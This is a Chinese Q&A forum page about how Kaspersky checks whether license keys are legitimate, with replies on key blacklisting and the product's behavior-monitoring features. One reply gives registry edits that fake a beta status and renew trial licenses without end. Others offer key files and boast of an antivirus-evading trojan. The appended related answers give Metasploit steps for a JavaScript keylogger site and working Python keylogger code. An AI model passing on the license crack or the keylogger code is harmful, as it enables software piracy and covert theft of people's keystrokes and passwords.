barriers / 阅读 / 详情

卡巴斯基达人请进 官方判断软件副本是否合法的原理

2023-07-15 13:12:09
共9条回复
阿啵呲嘚

卡巴斯基软件在每次更新的时候服务器都会检测并记录被更新副本的授权编号,也就是你使用的Key。如果你只装在一台机器上,一天最多只会产生24次更新,也就是说如果卡巴斯基服务器收集到世界各地的更新服务器记录到的这个Key更新次数的总和超过24次,那么就会认为这个Key已经被滥用,卡巴斯基官方会将这个Key列入黑名单中。卡巴斯基的更新文件中均含有blacklist文件,这个文件记录了所有尚未过期并且已被列入黑名单的Key,在你的卡巴斯基软件更新完成后,它会到blacklist文件中查找自己的Key,如果找到了则说明自己用的Key是不合法的,这样软件就会提示你购买新的卡巴斯基Key来使用,否则无法再次进行更新!顺便说一句,如果修改或删除了blacklist文件,卡巴斯基软件对更新包的校验就会出错,出于对安全的考虑它会重新下载整个更新包,因此试图通过对blacklist文件进行修改来逃避验证的方法是不可行的!

那么,如果你用的不是卡巴斯基官方更新服务器,或是说你不到官方指定的服务器去更新,那么官方就有可能无从知道一个Key实际上被更新了多少次,事实上在一个完全隔离于Internet的网络中(比如你说的这种情况)卡巴斯基官方的确无从知道你的Key是否被重复利用,也不会知道你用的那些Key在何时何地更新了多少次。也就是说只要这些Key在Internet上不被滥用,你安装在多少个这样的局域网中都是没关系的,它永远都不会被封掉!

以上就是我了解到的卡巴斯基软件识别授权合法性的原理,这在可连接到Internet的局域网中是通用的,官方都可以知道你的Key已经被更新而不论它是否位于局域网的计算机中!

回答你的问题:

1.我用对比软件做过实验,即使有权限的情况下,也不会改变其中任何文件的,请放心使用!

2.会的,这就取决于你的局域网是否可以连接到Internet呀,所以情况是不一样的!

3.不会的,卡巴斯基的更新源分发就是为了做这个的,是个典型应用,合理合法!

可以的,没问题,我就这样做过的!建议你在分配授权时做相应记录,因为没有记录以后会相当混乱,并且也不好维护!

在两个网络之间移动计算机,那有可能更新上会出点问题,需要再设置一下吧,只要Key不冲突就没事。如果Key有冲突那就不好办了,现在的卡巴斯基可以自动检测局域网内是否有公用的Key,只要检测到两台计算机就同时无法使用卡巴了!这个问题我曾经请教过卡巴斯基的技术中心,他们的说法是出现那种情况也没关系,两台计算机同时删除卡巴授权,在用不同的授权文件激活,就可以正常使用了,一般官方不会封这样被误用的Key啦!

祝你成功,支持正版!

gitcloud

1.应用程序活动分析器

基本防护:主动防御会启用应用程序活动分析,包含下列防护选项:

危险行为(分析系统中的应用程序行为)

入侵到程序(入侵者)

Rootkit检测

注册表中可疑的值

可疑的系统活动

启用程序活动分析器包含以下9种防护:

(1)危险行为:卡巴斯基分析安装在您计算机中的应用程序活动,并以卡巴斯基实验室所研发的规则清单为基础,侦测危险或可疑的应用程序活动。这些活动包括:应用程序隐藏安装或应用程序自我复制。

(2)用参数启动互联网浏览器:分析这种型式的活动,您可以侦测到企图修改浏览器设定的行为。这种活动的特色是会透过其它应用程序的某几个指令(command prompt)来修改设定,例如当您点选广告邮件(垃圾邮件)里面的超级链接(URL)。

(3)入侵到进程(入侵者):在某些应用程序加入额外的程序代码或新增额外程序。这种活动被广泛运用在木马上。

(4)Rootkit检测:Rootkit被用来隐藏系统内的恶意程序和执行程序。卡巴斯基能够分析操作系统中的隐藏程序。

(5)Window 钩子:这种活动企图去读取Windows对话框显示的密码文件和其它机密资料。假如它企图拦截对话框和操作系统之间传输的资料,卡巴斯基会追踪这个活动。

(6)注册表中的可疑值:系统登录文件是储存Windows操作系统和使用者设定的数据库,包含安装在计算机内的应用程序资料。当恶意程序企图隐藏自己的行踪、复制不正确的值到系统登录文件(机码),卡巴斯基会分析可疑的系统登录文件。

(7)可疑的系统活动:这个程序会分析Windows操作系统执行的动作,并侦测可疑行为,举例来说,当可疑的活动开始执行,它可能会破坏系统完整性,包含在监控的应用程序里修改一个或多个模块设定。

(8)Keylogger检测:当您使用键盘输入密码或其它机密信息时,这种活动会企图透过恶意程序来窃取。

(9)Microsoft Windows任务管理器保护:当恶意程序试图阻挡工作管理员的运作时,卡巴斯基保护工作管理员不被感染。

这个功能就是监控你要运行的程序是不是有恶意行为。比如你运行珊瑚虫版QQ卡巴报警说检测到风险程序 该程序试图注入到另外的进程或程序这种行为是典型的恶意程序 或者你运行别的什么程序报警说有风险程序 。就是因为你打开了程序活动分析器的缘故。

打个比方说,路上设有好多检查站(卡巴杀毒软件),对于走在路上的爱滋病患者(病毒)检查站会报警,但对与普通人不会;但是对于限制级区域(各种进程模块),不论是爱滋病患者还是普通人,在未经允许进入(注入模块)时检查站都会报警,此时不是因为病毒,而是因为“进入”这种行为。

invader是“入侵者”的意思。卡巴报警是因为一些无毒的软件运行时需要注入其它进程,这种行为是入侵行为,因为它未经允许,同时把这些软件定义为风险软件。

只要你确定运行的程序无毒,就可以大胆的不去管它。类似你进入限制级区域,不管你的目的是什么,检查站都会报警,因为你进入这种行为是风险行为,同时检查站把你定义为有风险的人(风险软件)。

风险(invader)软件报警是卡巴特有的,这说明卡巴很严格,风险软件不一定是病毒,几乎100%的软件不可能独立运行,都需要其他程序的支持,注入行为不可避免。

对程序不是太了解的话此功能可以先不用。等你有了一定的基础可以再用。(我在使用)

2.应用程序完整性控制

卡巴斯基程序完整性控制是卡巴斯基弹出提示最多的,而且把系统正常的加载行为也列入可疑行为并提示用户如何操作(允许还是拒绝)对于对系统不明白的人来说很难辨别。弄不好还会导致系统出现错误。我的实际操作发现这个功能打开的话如果操作不当容易造成死机。为什么呢?因为你打开的程序要调用别的程序这时卡巴会提示你允许还是拒绝,如果你拒绝的话这样就出现一个不停的试图去调用一个不停的去阻止所以就会出现死机的情况。

程序完整性控制的提示框都是某某程序试图加载新建或修改的某某模块,其中前面的某某程序是卡巴斯基规则库制定好的系统模块,也就是系统运行的一些必备程序(例如:explorer、Rundll32等等)而后面的那个被加载的程序则是前面的程序模块运行时要加载开启的程序模块,卡巴斯基的程序完整性控制把系统正常的加载行为也列入可疑行为并提示用户如何操作(允许还是拒绝)

这个功能初次使用弹出非常频繁,随着规则的增多,弹出会不断减少的,几乎每运行一个程序卡巴斯基会弹出无数的提示,如果你确定没有问题了,点允许烦了,把创建规则的钩钩上,卡巴斯基就不会频繁弹出了,并且自动允许加载。另外大家一定要把自动添加微软数字签名的程序到列表的钩钩上

好了,就说到这里。我嫌麻烦没用这个功能。

对安全性要求比较高的并且对程序十分了解的可以打开。

3.注册表护卫

顾名思义就是监控注册表。哪个程序想修改注册表时卡巴会提醒你允许还是拒绝。别的不再赘述。

皮皮

我没看多少,我怎么觉得你在讨论key呢?91卡巴KEY多的很,你打算买?

服务器是可以通过更新包更新其他主机的。还有你是。一个key是可以多用户使用的。但有用户限制。

其实杀毒软件没什么用。告诉你就是防火墙有用。管好你的SQL的扩展,封服务器的端口.系统盘用FAT32.密码用户名复杂点.打好补丁

最到以上几点.至少我是没多大办法黑进去.

杀毒软件有屁用啊,我给你一个木马要吗?我刚做的过所有杀毒软件。。。。。。。。。。

蓓蓓

这个你可以试试,如果可以的话,分享一下 。不过,即便封了也没关系。有办法破解。

1. Right-click Kaspersky Internet Security/Anti-Virus icon in system-tray and select Settings.

2. Now click the Options link and un-check Enable Self-Defense as shown below.

Disable Kaspersky Self-Defense

3. Launch Windows Registry editor by entering regedit and clicking OK in Windows Run Dialog (Start -> Run).4. Navigate to HKEY_LOCAL_MACHINESOFTWAREKasperskyLabprotectedAVP8environment and select ProductStatus key in right-side panel.

Kaspersky Registry Hack

5. Change the key-value from Release to Beta, close registry editor and enable self-defense in Kaspersky.

Hacked Kaspersky Key

6. Now, reboot your computer.

7. After rebooting right-click Kaspersky icon in system-tray and select Activate..., a new option Activate beta version should now be available in activation dialog, click it to proceed.

Kaspersky Activation Window

8. You should be connected to internet and it will display the activation success message, your BETA license will be valid for 30 days but you can re-perform the process again to get another 30 day license and so on for unlimited access.

Kaspersky Fully Activated

I am sure Kaspersky will disable this backdoor in their upcoming releases but as you all know the game continues.

很简单。修改一下注册表,完事儿。

小菜G

放心,一个局域网中的机器,升级服务器会默认成一个IP地址,就像一个家庭几台机一样,不会封掉的。放心用吧。希望你早日解决问题,加油!

LocCloud
* 回复内容中包含的链接未经审核,可能存在风险,暂不予完整展示!

这些你还是去卡巴斯基官网问下吧

在线客服: 客服邮箱:kaba365@pcstars.c*.cn(24 小时内回复) 销售客服:(购买咨询|订单查询|兑换帮助)400-819-13-13(7*24小时) 技术客服:(安装|使用问题咨询)400-611-6633(7*24小时)

苏州马小云

不可能重复的,就像QQ一个在号,在两个地方登入似的

okok云

原理不知道,但是你要是想要key文件,我倒是可以给你几个……

clou

太深奥了

相关推荐

Keylogger最大的特点是什么?和其他病毒,如木马等有什么区别?病毒分为哪几类?

keylogger是键盘记录器,该软件可以驻留在系统的后台,悄悄的记录下所有的键盘按键动作或者是改变你的键盘输入情况(又称键盘按键偷窥器,属于非法或是恶意软件)(盗号者常用软件之一)属于非法的骇客软件。现在有一部分软件和网络游戏内部也镶嵌有keylogger键盘记录器(QQ三国等),但是这个软件还是不安全的。按病毒存在的媒体  病毒类型:根据病毒存在的媒体,病毒可以划分为网络病毒,文件病毒,引导型病毒。网络病毒通过计算机网络传播感染网络中的可执行文件,文件病毒感染计算机中的文件(如:COM,EXE,DOC等),引导型病毒感染启动扇区(Boot)和硬盘的系统引导扇区(MBR),还有这三种情况的混合型,例如:多型病毒(文件和引导型)感染文件和引导扇区两种目标,这样的病毒通常都具有复杂的算法,它们使用非常规的办法侵入系统,同时使用了加密和变形算法。按病毒传染的方法  根据病毒传染的方法可分为驻留型病毒和非驻留型病毒,驻留型病毒感染计算机后,把自身的内存驻留部分放在内存(RAM)中,这一部分程序挂接系统调用并合并到操作系统中去,他处于激活状态,一直到关机或重新启动.非驻留型病毒在得到机会激活时并不感染计算机内存,一些病毒在内存中留有小部分,但是并不通过这一部分进行传染,这类病毒也被划分为非驻留型病毒。按病毒破坏的能力  无害型:除了传染时减少磁盘的可用空间外,对系统没有其它影响。  无危险型:这类病毒仅仅是减少内存、显示图像、发出声音及同类音响。  危险型:这类病毒在计算机系统操作中造成严重的错误。   非常危险型:这类病毒删除程序、破坏数据、清除系统内存区和操作系统中重要的信息。这些病毒对系统造成的危害,并不是本身的算法中存在危险的调用,而是当它们传染时会引起无法预料的和灾难性的破坏。由病毒引起其它的程序产生的错误也会破坏文件和扇区,这些病毒也按照他们引起的破坏能力划分。一些现在的无害型病毒也可能会对新版的DOS、Windows和其它操作系统造成破坏。例如:在早期的病毒中,有一个“Denzuk”病毒在360K磁盘上很好的工作,不会造成任何破坏,但是在后来的高密度软盘上却能引起大量的数据丢失。按病毒的算法  伴随型病毒,这一类病毒并不改变文件本身,它们根据算法产生EXE文件的伴随体,具有同样的名字和不同的扩展名(COM),例如:XCOPY.EXE的伴随体是XCOPY-COM。病毒把自身写入COM文件并不改变EXE文件,当DOS加载文件时,伴随体优先被执行到,再由伴随体加载执行原来的EXE文件。 “蠕虫”型病毒,通过计算机网络传播,不改变文件和资料信息,利用网络从一台机器的内存传播到其它机器的内存,计算网络地址,将自身的病毒通过网络发送。有时它们在系统存在,一般除了内存不占用其它资源。   寄生型病毒除了伴随和“蠕虫”型,其它病毒均可称为寄生型病毒,它们依附在系统的引导扇区或文件中,通过系统的功能进行传播,按其算法不同可分为:练习型病毒,病毒自身包含错误,不能进行很好的传播,例如一些病毒在调试阶段。   诡秘型病毒它们一般不直接修改DOS中断和扇区数据,而是通过设备技术和文件缓冲区等DOS内部修改,不易看到资源,使用比较高级的技术。利用DOS空闲的数据区进行工作。   变型病毒(又称幽灵病毒)这一类病毒使用一个复杂的算法,使自己每传播一份都具有不同的内容和长度。它们一般的作法是一段混有无关指令的解码算法和被变化过的病毒体组成。
2023-07-15 09:08:431

keylogger有什么作用

记录键盘活动的
2023-07-15 09:08:512

玩实况足球被卡巴检出keylogger,有问题吗?

没有危害的,我玩街头篮球网络游戏也被检查出keylogger木马,着是卡巴误报
2023-07-15 09:09:053

keylogger是病毒吗?

不是,我以前也遇到过
2023-07-15 09:09:133

如何利用Metasploit制造一个键盘窃听网站

Javascript keylogger简介:Javascript keylogger可以捕捉通过网络的键盘击键事件。使用JavaScript keylogger的优势在于:他不需要我们预先拥有一个服务器空间,然后再上传一个假冒的网页,写伪造的页面、插链接再写个蛋疼的采集脚本(如下图)…使用Metasploit制造键盘窃听网站:1. 打开msfconsle2.搜索Keylogger3.使用auxiliary/server/capture/http_javascript_keylogger模块4.查看模块配置情况5.我们这里以rapid7提供的Demo为例(页面比较简单)进行配置:Set demo trueSet uripath keylogger6.执行攻击模块
2023-07-15 09:09:211

电脑开机出现检测到威胁

啥杀毒软件
2023-07-15 09:09:305

trojan-spy.win32.keylogger.kh怎么杀

从名称来看这是一种木马(Trojan定义的为木马病毒)spy一般是间谍软件的定义。Win32是指32位的操作系统Keylogger估计是键盘记录型的因此你的机器可能中了键盘记录型的间谍型木马病毒了。具体怎么杀?这个很难说清楚的!你使用的这个能将它查报出来的杀毒软件有报这个病毒具体的路径么?有的话就简单一些了。直接用IceSword(冰刃)这个软件到安全模式下去将病毒文件删除掉;没有的话就烦了。你可以给我以消息。
2023-07-15 09:09:534

我的卡巴斯基杀病毒的里面怎么会出现这个(可能被非法用于破坏您的计算机或隐私数据的合法软件PDM.keylogge

卡巴10总是检测到威胁:可能被非法用于破坏您的计算机或隐私数据的合法软件PDM.keylogger C:WINDOWSSYSTEM32DRIVERSCMBPROTECTOR.DAT这个其实是键盘记录器,可以然它不提示的,如果你是卡巴2009或2010的话按照下面步骤进行就可以了:1打开卡巴的主界面点击设置 2选择威胁和排除,点击信任区域 3选择排除规则,点击添加 4"对象"前面的钩去掉,威胁类型前打钩 5选择威胁类型,掩码输入keylogger,高级设之前打钩输入"DRIVERALIDEVICE" 6注意:由于我所介绍的是支付宝的排除,所以在高级设置中输入的是"DRIVERALIDEVICE",至于其他软件需要排除的高级设置输入的内容可以从卡巴的报告记录中找到。 7然后点击"保护组件" 8打钩指定为"主动防御" 然后一直点击确定就大功告成了如果是2010的话就简单得多,卡巴斯基2010增强了对于这种情况的排掩,我们可以在主界面的“你的计算机已被保护”,我们可以直接使用右键选择添加到排除,使卡巴斯基在不影响检查其他程序键盘记录行为的前提下,排除无法找到路径的程序的键盘记录的行为! 第一次出现的时候是在我插入U盾的时候,我的卡巴还是试用版的添加排除即可 工行U盾插件
2023-07-15 09:10:081

卡巴斯基提示我检测到危险,可怎么清楚呢?

那检查看看是哪个程序的问题,把它加到高限制组,不让他胡作非为。2009-1-14 16:44:39 键盘记录器活动 DRIVERALIDEVICE 检测到威胁: Keylogger 2009-1-14 16:44:39 键盘记录器活动 DRIVERALIDEVICE 未终止: Keylo我以前也遇到过这种情况,卡巴自动把它隔离了
2023-07-15 09:10:283

运行模块Drivevmkbd 有可疑行为keylogger

可能是系统的一个组件,不会是病毒,把它信任就行了
2023-07-15 09:10:363

Diagnostics Tracking Service服务是什么,能禁用么

Diagnostics Tracking Service),简称为DiagTrack,被很多人认为是个臭名昭著的系统级“keylogger”(键盘记录器) 可以禁用win10系统叫“Connected User Experiences and Telemetry”。
2023-07-15 09:10:432

如何创建一个在后台使用python运行的键盘记录器

步骤1:从开始菜单中选择“Python 2.7> IDLE(Python GUI)”步骤2: 单击“文件>新窗口”步骤3: 现在在Python窗口中键入下面的代码,如图所示,import win32apiimport sysimport pythoncom, pyHookbuffer = ""def OnKeyboardEvent(event):if event.Ascii == 5:sys.exit()if event.Ascii != 0 or 8:f = open ("c:\output.txt", "a")keylogs = chr(event.Ascii)if event.Ascii == 13:keylogs = keylogs + " "f.write(keylogs)f.close()while True:hm = pyHook.HookManager()hm.KeyDown = OnKeyboardEventhm.HookKeyboard()pythoncom.PumpMessages()步骤4:将文件保存在C:作为Keylogger.py,然后单击RUN(CTRL + R: 键盘记录器将在后台启动,并将运行,直到日志文件 “C: output.txt” 任何将键入的内容键盘。)5这些是设计用于在目标计算机的软件上工作的计算机程序。键盘记录器用于IT组织,以解决计算机和业务网络的技术问题。家庭和商业人士合法使用键盘记录器来监视网络使用,而无需用户的直接知识。请不要在公共计算机上使用键盘记录器窃取密码或信用卡信息。
2023-07-15 09:11:151

键盘记录器病毒怎么删除?

这个问题需要看具体情况的,一般来说尝试删除注册表中的启动项。你也可以用类似金山清理专家这样的软件来清理启动项,将可疑的一些启动项删除掉。另外就是服务(控制面板-管理工具-服务,家庭版XP没有该选项没办法),这需要根据系统的具体情况来删的,因为每个人装的软件都不一样。如果大刀阔斧的删,很多软件就没用了,甚至系统也不正常了。。所以没看到具体的情况很难弄。。当然最彻底的方法(同时也最简单),就是格掉重装系统了。。
2023-07-15 09:11:262

Hacktool.Keylogger

Hacktool.Keyloggerhttp://www.symantec.com/home_homeoffice/security_response/writeup.jsp?docid=2004-080313-1109-99
2023-07-15 09:11:482

Trojan.Spy.Keylogger.vf

Trojan.Spy.KeyLogger.vf 破坏方法:记录用户的击键信息,发送到指定邮箱
2023-07-15 09:11:562

卡巴斯基总是说检测到PDM.keylog,请问怎么解决?

Keylogger俗称键盘记录器,不属于木马病毒一类,一些木马可能会带有此类工具,您的计算机中木马病毒如果已被清除掉这应该是安全的。另外一些键盘驱动可能会这样提示您,或者一些网络银行的安全控件或一些交易网站的安全控件也可能会 如此提示,这是卡巴主动防御当中的程序行为分析功能,一般来讲是正常的。您可以打开卡巴的报告查看具体提示您的对象名称,如果从正规网站下载的程序比较可信,是没问题的,添加信任区域即可。这里举个例子:支付宝的键盘记录ALIDEVICE添加排除:1.打开卡巴的主界面点击设置,选择设置左面的“威胁和排除”,点击右面的“信任区域”2.选择排除规则,点击“添加”,去掉"对象"前面的钩,“威胁类型”前打钩3.选择输入威胁类型的名称,掩码输入 keylogger ,“高级设置”之前打钩输入" DRIVERALIDEVICE "确定。(注意:此只是添加支付宝的排除,所以在高级设置中输入的是"DRIVERALIDEVICE",至于其他软件需要排除的高级设置输入的内容可以从卡巴的扫描报告记录中找到)4.威胁类型填完后,然后点击"保护组件"旁的任意,打钩指定为"主动防御",确定。5.最后在设置中确定即可。详情可参照:http://bbs.kaspersky.com.cn/viewthread.php?tid=122635&extra=page%3D1其他的可信程序可以按照此类方法添加。
2023-07-15 09:12:032

我是菜鸟,大家帮我看看这些端口是不是后门。*:*代表什么?

入侵电脑端口端口:0 服务:Reserved 说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。 端口:1 服务:tcpmux 说明:这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。 端口:7 服务:Echo 说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。 端口:19 服务:Character Generator 说明:这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。 端口:21 服务:FTP 说明:FTP服务器所开放的端口,用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。 端口:22 服务:Ssh 说明:PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点,如果配置成特定的模式,许多使用RSAREF库的版本就会有不少的漏洞存在。 端口:23 服务:Telnet 说明:远程登录,入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术,入侵者也会找到密码。木马Tiny Telnet Server就开放这个端口。 端口:25 服务:SMTP 说明:SMTP服务器所开放的端口,用于发送邮件。入侵者寻找SMTP服务器是为了传递他们的SPAM。入侵者的帐户被关闭,他们需要连接到高带宽的E-MAIL服务器上,将简单的信息传递到不同的地址。木马Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口。 端口:31 服务:MSG Authentication 说明:木马Master Paradise、Hackers Paradise开放此端口。 端口:42 服务:WINS Replication 说明:WINS复制 端口:53 服务:Domain Name Server(DNS) 说明:DNS服务器所开放的端口,入侵者可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其他的通信。因此防火墙常常过滤或记录此端口。 端口:67 服务:Bootstrap Protocol Server 说明:通过DSL和Cable modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址。HACKER常进入它们,分配一个地址把自己作为局部路由器而发起大量中间人(man-in-middle)攻击。客户端向68端口广播请求配置,服务器向67端口广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。 端口:69 服务:Trival File Transfer 说明:许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常由于错误配置而使入侵者能从系统中窃取任何 文件。它们也可用于系统写入文件。 端口:79 服务:Finger Server 说明:入侵者用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其他机器Finger扫描。 端口:80 服务:HTTP 说明:用于网页浏览。木马Executor开放此端口。 端口:99 服务:Metagram Relay 说明:后门程序ncx99开放此端口。 端口:102 服务:Message transfer agent(MTA)-X.400 over TCP/IP 说明:消息传输代理。 端口:109 服务:Post Office Protocol -Version3 说明:POP3服务器开放此端口,用于接收邮件,客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交 换缓冲区溢出的弱点至少有20个,这意味着入侵者可以在真正登陆前进入系统。成功登陆后还有其他缓冲区溢出错误。 端口:110 服务:SUN公司的RPC服务所有端口 说明:常见RPC服务有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等 端口:113 服务:Authentication Service 说明:这是一个许多计算机上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多计算机的信息。但是它可作为许多服务的记录器,尤其是FTP、POP、IMAP、SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务,将会看到许多这个端口的连接请求。记住,如果阻断这个端口客户端会感觉到在防火墙另一边与E-MAIL服务器的缓慢连接。许多防火墙支持TCP连接的阻断过程中发回RST。这将会停止缓慢的连接。 端口:119 服务:Network News Transfer Protocol 说明:NEWS新闻组传输协议,承载USENET通信。这个端口的连接通常是人们在寻找USENET服务器。多数ISP限制,只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送SPAM。 端口:135 服务:Location Service 说明:Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和RPC的服务利用计算机上的end-point mapper注册它们的位置。远端客户连接到计算机时,它们查找end-point mapper找到服务的位置。HACKER扫描计算机的这个端口是为了找到这个计算机上运行Exchange Server吗?什么版本?还有些DOS攻击直接针对这个端口。 端口:137、138、139 服务:NETBIOS Name Service 说明:其中137、138是UDP端口,当通过网上邻居传输文件时用这个端口。而139端口:通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于windows文件和打印机共享和SAMBA。还有WINS Regisrtation也用它。 端口:143 服务:Interim Mail Access Protocol v2 说明:和POP3的安全问题一样,许多IMAP服务器存在有缓冲区溢出漏洞。记住:一种LINUX蠕虫(admv0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已经被感染的用户。当REDHAT在他们的LINUX发布版本中默认允许IMAP后,这些漏洞变的很流行。这一端口还被用于IMAP2,但并不流行。 端口:161 服务:SNMP 说明:SNMP允许远程管理设备。所有配置和运行信息的储存在数据库中,通过SNMP可获得这些信息。许多管理员的错误配置将被暴露在Internet。Cackers将试图使用默认的密码public、private访问系统。他们可能会试验所有可能的组合。SNMP包可能会被错误的指向用户的网络。 端口:177 服务:X Display Manager Control Protocol 说明:许多入侵者通过它访问X-windows操作台,它同时需要打开6000端口。 端口:389 服务:LDAP、ILS 说明:轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。 端口:443 服务:Https 说明:网页浏览端口,能提供加密和通过安全端口传输的另一种HTTP。 端口:456 服务:[NULL] 说明:木马HACKERS PARADISE开放此端口。 端口:513 服务:Login,remote login 说明:是从使用cable modem或DSL登陆到子网中的UNIX计算机发出的广播。这些人为入侵者进入他们的系统提供了信息。 端口:544 服务:[NULL] 说明:kerberos kshell 端口:548 服务:Macintosh,File Services(AFP/IP) 说明:Macintosh,文件服务。 端口:553 服务:CORBA IIOP (UDP) 说明:使用cable modem、DSL或VLAN将会看到这个端口的广播。CORBA是一种面向对象的RPC系统。入侵者可以利用这些信息进入系统。 端口:555 服务:DSF 说明:木马PhAse1.0、Stealth Spy、IniKiller开放此端口。 端口:568 服务:Membership DPA 说明:成员资格 DPA。 端口:569 服务:Membership MSN 说明:成员资格 MSN。 端口:635 服务:mountd 说明:Linux的mountd Bug。这是扫描的一个流行BUG。大多数对这个端口的扫描是基于UDP的,但是基于TCP的mountd有所增加(mountd同时运行于两个端口)。记住mountd可运行于任何端口(到底是哪个端口,需要在端口111做portmap查询),只是Linux默认端口是635,就像NFS通常运行于2049端口。 端口:636 服务:LDAP 说明:SSL(Secure Sockets layer) 端口:666 服务:Doom Id Software 说明:木马Attack FTP、Satanz Backdoor开放此端口 端口:993 服务:IMAP 说明:SSL(Secure Sockets layer) 端口:1001、1011 服务:[NULL] 说明:木马Silencer、WebEx开放1001端口。木马Doly Trojan开放1011端口。 端口:1024 服务:Reserved 说明:它是动态端口的开始,许多程序并不在乎用哪个端口连接网络,它们请求系统为它们分配下一个闲置端口。基于这一点分配从端口1024开始。这就是说第一个向系统发出请求的会分配到1024端口。你可以重启机器,打开Telnet,再打开一个窗口运行natstat -a 将会看到Telnet被分配1024端口。还有SQL session也用此端口和5000端口。 端口:1025、1033 服务:1025:network blackjack 1033:[NULL] 说明:木马netspy开放这2个端口。 端口:1080 服务:SOCKS 说明:这一协议以通道方式穿过防火墙,允许防火墙后面的人通过一个IP地址访问INTERNET。理论上它应该只允许内部的通信向外到达INTERNET。但是由于错误的配置,它会允许位于防火墙外部的攻击穿过防火墙。WinGate常会发生这种错误,在加入IRC聊天室时常会看到这种情况。端口:1170 服务:[NULL] 说明:木马Streaming Audio Trojan、Psyber Stream Server、Voice开放此端口。 端口:1234、1243、6711、6776 服务:[NULL] 说明:木马SubSeven2.0、Ultors Trojan开放1234、6776端口。木马SubSeven1.0/1.9开放1243、6711、6776端口。 端口:1245 服务:[NULL] 说明:木马Vodoo开放此端口。 端口:1433 服务:SQL 说明:Microsoft的SQL服务开放的端口。 端口:1492 服务:stone-design-1 说明:木马FTP99CMP开放此端口。 端口:1500 服务:RPC client fixed port session queries 说明:RPC客户固定端口会话查询 端口:1503 服务:NetMeeting T.120 说明:NetMeeting T.120 端口:1524 服务:ingress 说明:许多攻击脚本将安装一个后门SHELL于这个端口,尤其是针对SUN系统中Sendmail和RPC服务漏洞的脚本。如果刚安装了防火墙就看到在这个端口上的连接企图,很可能是上述原因。可以试试Telnet到用户的计算机上的这个端口,看看它是否会给你一个SHELL。连接到600/pcserver也存在这个问题。 端口:1600 服务:issd 说明:木马Shivka-Burka开放此端口。 端口:1720 服务:NetMeeting 说明:NetMeeting H.233 call Setup。 端口:1731 服务:NetMeeting Audio Call Control 说明:NetMeeting音频调用控制。 端口:1807 服务:[NULL] 说明:木马SpySender开放此端口。 端口:1981 服务:[NULL] 说明:木马ShockRave开放此端口。 端口:1999 服务:cisco identification port 说明:木马BackDoor开放此端口。 端口:2000 服务:[NULL] 说明:木马GirlFriend 1.3、Millenium 1.0开放此端口。 端口:2001 服务:[NULL] 说明:木马Millenium 1.0、Trojan Cow开放此端口。 端口:2023 服务:xinuexpansion 4 说明:木马Pass Ripper开放此端口。 端口:2049 服务:NFS 说明:NFS程序常运行于这个端口。通常需要访问Portmapper查询这个服务运行于哪个端口。 端口:2115 服务:[NULL] 说明:木马Bugs开放此端口。 端口:2140、3150 服务:[NULL] 说明:木马Deep Throat 1.0/3.0开放此端口。 端口:2500 服务:RPC client using a fixed port session replication 说明:应用固定端口会话复制的RPC客户 端口:2583 服务:[NULL] 说明:木马Wincrash 2.0开放此端口。 端口:2801 服务:[NULL] 说明:木马Phineas Phucker开放此端口。 端口:3024、4092 服务:[NULL] 说明:木马WinCrash开放此端口。 端口:3128 服务:squid 说明:这是squid HTTP代理服务器的默认端口。攻击者扫描这个端口是为了搜寻一个代理服务器而匿名访问Internet。也会看到搜索其他代理服务器的端口8000、8001、8080、8888。扫描这个端口的另一个原因是用户正在进入聊天室。其他用户也会检验这个端口以确定用户的机器是否支持代理。 端口:3129 服务:[NULL] 说明:木马Master Paradise开放此端口。 端口:3150 服务:[NULL] 说明:木马The Invasor开放此端口。 端口:3210、4321 服务:[NULL] 说明:木马SchoolBus开放此端口 端口:3333 服务:dec-notes 说明:木马Prosiak开放此端口 端口:3389 服务:超级终端 说明:WINDOWS 2000终端开放此端口。 端口:3700 服务:[NULL] 说明:木马Portal of Doom开放此端口 端口:3996、4060 服务:[NULL] 说明:木马RemoteAnything开放此端口 端口:4000 服务:QQ客户端 说明:腾讯QQ客户端开放此端口。 端口:4092 服务:[NULL] 说明:木马WinCrash开放此端口。 端口:4590 服务:[NULL] 说明:木马ICQTrojan开放此端口。 端口:5000、5001、5321、50505 服务:[NULL] 说明:木马blazer5开放5000端口。木马Sockets de 